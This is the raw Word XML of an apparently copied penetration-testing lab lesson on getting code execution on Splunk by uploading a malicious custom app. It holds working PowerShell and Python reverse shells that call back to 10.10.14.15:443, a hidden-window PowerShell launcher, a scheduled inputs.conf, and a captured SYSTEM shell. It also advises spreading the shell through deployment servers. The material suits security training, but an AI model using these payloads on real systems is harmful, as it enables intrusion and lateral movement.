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2E1A" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="00643968">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643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Attacking Splunk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F882EC" w14:textId="77777777"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pict w14:anchorId="52B175DF">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C36BA7"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As discussed in the previous section, we can gain remote code execution on Splunk by creating a custom application to run Python, Batch, Bash, or PowerShell scripts. From the Nmap discovery scan, we noticed that our target is a Windows server. Since Splunk comes with Python installed, we can create a custom Splunk application that gives us remote code execution using Python or a PowerShell script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B05D04B" w14:textId="77777777"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pict w14:anchorId="7D03BE94">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19149302" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="0064396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43968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Abusing Built-In Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45586B53"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We can use </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00643968">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Splunk package to assist us. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory in this repo has examples for </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00643968">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Python</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00643968">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>PowerShell</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. Let's walk through this step-by-step.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1A2072"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To achieve this, we first need to create a custom Splunk application using the following directory structure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415BB8B0"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yovecio@htb[/htb]$ tree splunk_shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C91AC4"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C14C173"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634E1026"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 bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CE648F"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 default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF4AB39"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1598B6B"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2 directories, 0 files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334635F4"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory will contain any scripts that we intend to run (in this case, a PowerShell reverse shell), and the default directory will have our </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>inputs.conf</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file. Our reverse shell will be a PowerShell one-liner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2790A051" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="00643968">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643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">#A simple and small reverse shell. Options and help removed to save space. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263129F" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="00643968">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643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCE5DBD" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="00643968">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643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$client = New-Object System.Net.Sockets.TCPClient('10.10.14.15',443);$stream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p>
    <w:p w14:paraId="50EEFECA"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The </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00643968">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>inputs.conf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file tells Splunk which script to run and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB17122"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 xml:space="preserve">yovecio@htb[/htb]$ cat inputs.conf </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614E18D0"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C1AE052"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[script://./bin/rev.py]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C6DD2"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">disabled = 0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE0ECC"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 xml:space="preserve">interval = 10  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677A652D"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 xml:space="preserve">sourcetype = shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D884A9C"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0A325A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[script://.\bin\run.bat]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE84F7D"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disabled = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743E1D63"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sourcetype = shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFA5AE6"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interval = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587DEDD0"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We need the .bat file, which will run when the application is deployed and execute the PowerShell one-liner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7219309B"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@ECHO OFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AA7AA"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PowerShell.exe -exec bypass -w hidden -Command "&amp; '%~dpn0.ps1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEFA40"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Exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C34CC1"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Once the files are created, we can create a tarball or </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.spl</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43646A58"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yovecio@htb[/htb]$ tar -cvzf updater.tar.gz splunk_shell/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5090D3"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3D0ED34"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128DC2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splunk_shell/bin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07928C2E"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splunk_shell/bin/rev.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C18632E"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splunk_shell/bin/run.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA1A47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splunk_shell/bin/run.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F5161"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splunk_shell/default/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451E2AA"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splunk_shell/default/inputs.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247140DE"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The next step is to choose </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Install app from file</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> and upload the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D24577" w14:textId="38505234"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object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="13B33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9.55pt;height:17.9pt" o:ole="">
            <v:imagedata r:id="rId8" o:title=""/>
          </v:shape>
          <w:control r:id="rId9" w:name="DefaultOcxName" w:shapeid="_x0000_i1038"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BF9E47" w14:textId="477EC7C9"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DD4B7B8" wp14:editId="61A66508">
            <wp:extent cx="5731510" cy="2174240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="744557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A27DE89"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Before uploading the malicious custom app, let's start a listener using Netcat or </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00643968">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>socat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66911851"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yovecio@htb[/htb]$ sudo nc -lnvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EC0A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911AFB8"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listening on [any] 443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768EF2A4"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On the </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Upload app</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> page, click on browse, choose the tarball we created earlier and click </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Upload</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FF84BF" w14:textId="7D62E84A"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lastRenderedPageBreak/>
        <w:object w:dxaOrig="1440" w:dyaOrig="1440" w14:anchorId="4498E50F">
          <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:49.55pt;height:17.9pt" o:ole="">
            <v:imagedata r:id="rId12" o:title=""/>
          </v:shape>
          <w:control r:id="rId13" w:name="DefaultOcxName1" w:shapeid="_x0000_i1037"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994874D" w14:textId="45E7BC5B"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noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38985AC6" wp14:editId="6A7FDA54">
            <wp:extent cx="5731510" cy="1827530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="34532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12176EBD"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As soon as we upload the application, a reverse shell is received as the status of the application will automatically be switched to </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Enabled</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2800135E"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yovecio@htb[/htb]$ sudo nc -lnvp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F3B44C"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158957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listening on [any] 443 ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A9F25"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connect to [10.10.14.15] from (UNKNOWN) [10.129.201.50] 53145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6808AA"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1211A6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DFEC78B"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PS C:\Windows\system32&gt; whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323A0F71"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86F23E9"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nt authority\system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC194E2"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F798A0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4B105EA"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PS C:\Windows\system32&gt; hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C8D8B"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C0ED56E"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APP03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501E9ED2"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1BFD187"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6D60FD1"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PS C:\Windows\system32&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D29B4B9"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In this case, we got a shell back as </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>NT AUTHORTY\SYSTEM</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>. If this were a real-world assessment, we could proceed to enumerate the target for credentials in the registry, memory, or stored elsewhere on the file system to use for lateral movement within the network. If this was our initial foothold in the domain environment, we could use this access to begin enumerating the Active Directory domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406D0FC"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 xml:space="preserve">If we were dealing with a Linux host, we would need to edit the </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>rev.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python script before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C1ABA" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="00643968">
      <w:pPr>
        <w:spacing w:after="0"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t>Code: python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEA40D6"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import sys,socket,os,pty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC647D4"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7BE740C"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ip="10.10.14.15"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076B6A4"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port="443"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754999F3"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s=socket.socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A40075"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s.connect((ip,int(port)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B241AC"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[os.dup2(s.fileno(),fd) for fd in (0,1,2)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028E5408" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="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43968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>pty.spawn('/bin/bash')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A63A4" w14:textId="77777777" w:rsidR="00643968" w:rsidRPr="00643968" w:rsidRDefault="00643968" w:rsidP="0064396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43968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">If the compromised Splunk host is a deployment server, it will likely be possible to achieve RCE on any hosts with Universal Forwarders installed on them. To push a reverse shell out to other hosts, the application must be placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>$SPLUNK_HOME/etc/deployment-apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00643968">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory on the compromised host. In a Windows-heavy environment, we will need to create an application using a PowerShell reverse shell since the Universal forwarders do not install with Python like the Splunk server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851DF87"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80"/>
    <w:rsid w:val="00213442"/>
    <w:rsid w:val="00643968"/>
    <w:rsid w:val="00F8478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3D57"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2C61788C-C949-4BCC-8A64-C5DB6D63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96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643968"/>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68"/>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643968"/>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643968"/>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643968"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
